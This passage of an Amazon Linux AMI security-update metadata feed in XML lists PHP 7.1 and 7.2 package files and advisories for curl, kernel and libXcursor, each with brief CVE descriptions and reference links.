arch="x86_64"><filename>Packages/php71-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.13-1.7.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.13" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.13-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1148</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1148: low priority package update for curl</title><issued date="2019-01-21 23:46:00" /><updated date="2019-01-25 03:51:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16842:
Curl versions 7.14.1 through 7.61.1 are vulnerable to a heap-based buffer over-read in the tool_msgs.c:voutf() function that may result in information exposure and denial of service.
1644124:
CVE-2018-16842 curl: Heap-based buffer over-read in the curl tool warning formatting
CVE-2018-16840:
A heap use-after-free flaw was found in curl versions from 7.59.0 through 7.61.1 in the code related to closing an easy handle. When closing and cleaning up an &#039;easy&#039; handle in the `Curl_close()` function, the library code first frees a struct (without nulling the pointer) and might then subsequently erroneously write to a struct field within that already freed struct.
1642203:
CVE-2018-16840 curl: Use-after-free when closing "easy" handle in Curl_close()
CVE-2018-16839:
Curl versions 7.33.0 through 7.61.1 are vulnerable to a buffer overrun in the SASL authentication code that may lead to denial of service.
1642201:
CVE-2018-16839 curl: Integer overflow leading to heap-based buffer overflow in Curl_sasl_create_plain_message()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16839" title="" id="CVE-2018-16839" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16840" title="" id="CVE-2018-16840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16842" title="" id="CVE-2018-16842" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.53.1" release="16.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-16.86.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="16.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-16.86.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.53.1" release="16.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-16.86.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-16.86.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="16.86.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-16.86.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="16.86.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-16.86.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="16.86.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-16.86.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.86.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-16.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1149</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1149: important priority package update for kernel</title><issued date="2019-01-25 02:26:00" /><updated date="2019-01-25 02:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16884:
A flaw was found in the Linux kernel&#039;s NFS41+ subsystem. NFS41+ shares mounted in different network namespaces at the same time can make bc_svc_process() use wrong back-channel IDs and cause a use-after-free vulnerability. Thus a malicious container user can cause a host kernel memory corruption and a system panic. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.
1660375:
CVE-2018-16884 kernel: nfs: use-after-free in svc_process_common()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16884" title="" id="CVE-2018-16884" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.94" release="73.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.94-73.73.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.94-73.73.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.94" release="73.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.94-73.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1150</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1150: low priority package update for libXcursor</title><issued date="2019-02-07 04:22:00" /><updated date="2019-02-08 06:23:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-9262:
_XcursorThemeInherits in library.c in libXcursor before 1.1.15 allows remote attackers to cause denial of service or potentially code execution via a one-byte heap overflow.
1611599:
CVE-2015-9262 libxcursor: 1-byte heap-based overflow in _XcursorThemeInherits function in library.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9262" title="" id="CVE-2015-9262" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXcursor-debuginfo" version="1.1.14" release="2.1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-debuginfo-1.1.14-2.1.10.amzn1.x86_64.rpm</filename></package><package name="libXcursor-devel" version="1.1.14" release="2.1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-devel-1.1.14-2.1.10.amzn1.x86_64.rpm</filename></package><package name="libXcursor" version="1.1.14" release="2.1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-1.1.14-2.1.10.amzn1.x86_64.rpm</filename></package><package name="libXcursor-devel" version="1.1.14" release="2.1.10.amzn1" epoch="0" arch="i686"><filename>Packages/libXcursor-devel-1.1.14-2.1.10.amzn1.i686.rpm</filename></package><package name="libXcursor" version="1.1.14" release="2.1.10.amzn1" epoch="0" 